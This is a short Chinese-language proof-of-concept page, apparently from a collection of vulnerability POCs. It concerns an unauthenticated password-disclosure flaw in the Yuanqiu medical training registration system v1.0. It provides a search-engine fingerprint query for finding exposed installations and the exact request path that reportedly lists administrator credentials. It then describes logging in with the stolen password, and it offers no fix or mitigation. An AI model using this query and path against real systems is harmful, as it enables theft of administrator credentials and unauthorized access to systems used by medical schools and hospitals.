POC00/远秋医学培训报名系统v1.0ManagerList存在未授权账号密码泄露漏洞.md

# 远秋医学培训报名系统v1.0 ManagerList存在未授权账号密码泄露漏洞

# 一、漏洞简介
远秋医学在线考试系统采用通用的试题库管理软件，适用于各级各类医学院校和医院。远秋医学在线考试系统某接口存在未授权信息泄露漏洞，攻击者可利用该漏洞获取数据库敏感信息。远秋医学培训报名系统v1.0存在未授权访问漏洞，攻击者可通过漏洞获取登录密码。

# 二、影响版本
+ 远秋医学培训报名系统v1.0

# 三、资产测绘
```plain
title="远秋医学培训报名系统v1.0"
```

![1718993325214-398499d2-2af5-4412-88af-a1260ffee33c.png](./img/H5wj7sp5XRf9yr1n/1718993325214-398499d2-2af5-4412-88af-a1260ffee33c-639148.png)

# 四、漏洞复现
```java
/User/ManagerList.aspx?ty=1&ty=1
```

![1718993342894-79c3c62d-1bcc-48db-900b-10ebc348ffc5.png](./img/H5wj7sp5XRf9yr1n/1718993342894-79c3c62d-1bcc-48db-900b-10ebc348ffc5-960549.png)

使用获取密码登录系统

![1718993436210-024def15-1cfe-4c15-a908-3ee6e49cad05.png](./img/H5wj7sp5XRf9yr1n/1718993436210-024def15-1cfe-4c15-a908-3ee6e49cad05-563873.png)



> 更新: 2024-06-23 23:40:49  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qy0el2vabhtch5nc>